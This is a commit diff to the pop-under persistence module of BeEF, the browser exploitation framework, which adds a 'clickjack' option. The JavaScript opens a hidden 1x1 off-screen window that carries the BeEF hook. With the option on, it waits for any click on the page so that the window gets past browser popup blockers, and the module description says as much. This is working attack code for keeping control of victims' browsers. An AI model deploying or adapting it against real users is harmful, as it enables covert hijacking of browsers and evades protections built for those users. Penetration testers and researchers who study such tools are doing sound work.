Add click event handler to popunder window module

2017-04-10 18:30:26 +00:00
parent 5d927d9d1b
commit a03164f212
3 changed files with 48 additions and 21 deletions
--- a/modules/persistence/popunder_window/command.js
+++ b/modules/persistence/popunder_window/command.js
@@ -5,16 +5,42 @@
 //

 beef.execute(function() {
-	var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html';
-	var popunder_name = Math.random().toString(36).substring(2,10);
-	beef.debug("[Create Pop-Under] Creating window '" + popunder_name + "' for '" + popunder_url + "'");
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window requested');
-	try {
-		window.open(popunder_url,popunder_name,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
-		window.focus();
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.are.status_success());
-	} catch(e) {
-		beef.debug("[Create Pop-Under] Could not create pop-under window");
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.are.status_error());
-	}
+  var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html';
+  var popunder_name = Math.random().toString(36).substring(2,10);
+
+  function popunder() {
+    beef.debug("[Create Pop-Under] Creating window '" + popunder_name + "' for '" + popunder_url + "'");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window requested');
+
+    try {
+      window.open(popunder_url,popunder_name,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
+      window.focus();
+      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.are.status_success());
+    } catch(e) {
+      beef.debug("[Create Pop-Under] Could not create pop-under window");
+      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.are.status_error());
+    }
+
+    if (document.removeEventListener) {
+      // Every sane browser
+      document.removeEventListener("click", popunder);
+    } else {
+      // IE8 and earlier
+      document.detachEvent("onclick", popunder);
+    }
+  }
+
+  if ('<%= @clickjack %>' == 'on') {
+    beef.debug("[Create Pop-Under] Waiting for click event...");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Waiting for click event');
+    if (document.addEventListener) {
+      // Every sane browser
+      document.addEventListener("click", popunder);
+    } else {
+      // IE8 and earlier
+      document.attachEvent("onclick", popunder);
+    }
+  } else {
+    popunder();
+  }
 });
--- a/modules/persistence/popunder_window/config.yaml
+++ b/modules/persistence/popunder_window/config.yaml
@@ -9,7 +9,7 @@ beef:
            enable: true
            category: "Persistence"
            name: "Create Pop Under"
-            description: "This module creates a new discreet pop under window with the BeEF hook included.<br><br>Another browser node will be added to the hooked browser tree."
+            description: "This module creates a new discreet pop under window with the BeEF hook included.<br><br>Another browser node will be added to the hooked browser tree.<br/><br/>Modern browsers block popups by default and warn the user the popup was blocked (unless the origin is permitted to spawn popups).<br/><br/>However, this check is bypassed for some user-initiated events such as clicking the page. Use the 'clickjack' option below to add an event handler which spawns the popup when the user clicks anywhere on the page. Running the module multiple times will spawn multiple popups for a single click event.<br/><br/>Note: mobile devices may open the new popup window on top or redirect the current window, rather than open in the background."
            authors: ["ethicalhack3r"]
            target:
                user_notify: ["ALL"]
--- a/modules/persistence/popunder_window/module.rb
+++ b/modules/persistence/popunder_window/module.rb
@@ -4,12 +4,13 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Popunder_window < BeEF::Core::Command
-  
-  	# This method is being called when a hooked browser sends some
-  	# data back to the framework.
-  	#
-  	def post_execute
-    		save({'result' => @datastore['result']})
-  	end
-  
+  def self.options
+    [{ 'name' => 'clickjack',
+       'ui_label' => 'Clickjack',
+       'type' => 'checkbox',
+       'checked' => false }]
+  end
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
 end